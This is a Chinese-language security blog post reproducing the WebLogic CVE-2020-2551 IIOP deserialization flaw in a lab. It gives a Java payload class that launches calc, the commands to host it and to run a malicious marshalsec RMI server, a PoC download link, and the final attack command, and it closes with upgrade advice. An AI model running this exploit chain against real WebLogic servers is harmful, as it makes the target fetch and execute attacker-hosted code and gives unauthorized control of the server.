Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

  • A+
所属分类:安全文章

漏洞概述

攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。

IIOP协议以Java接口的形式对远程对象进行访问,默认启用。

 

影响版本:

weblogic 10.3.6

weblogic 12.1.3.0

weblogic 12.2.1.3.0

weblogic 12.2.1.4.0

 

环境搭建

下载地址

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


 

漏洞复现

访问http://your-ip:7001/console看到页面

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


构造如下java,保存为exp.java

import java.io.IOException;public class exp {static{try {java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});} catch (IOException e) {e.printStackTrace();}}public static void main(String[] args) {

}}


Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

 

编译生成exp.class

javac exp.java -source 1.6 -target 1.6


启动web服务

python -m SimpleHTTPServer 80


 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.0.103/#exp” 1099


 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


Poc下载地址

https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg


漏洞攻击,成功弹出calc

java -jar weblogic_CVE_2020_2551.jar 192.168.0.103 7001 rmi://192.168.0.103:1099/exp


 

Weblogic CVE-2020-2551 IIOP反序列化漏洞复现


 

修复建议

升级到安全版本

 

 


本文始发于微信公众号(锋刃科技):Weblogic CVE-2020-2551 IIOP反序列化漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: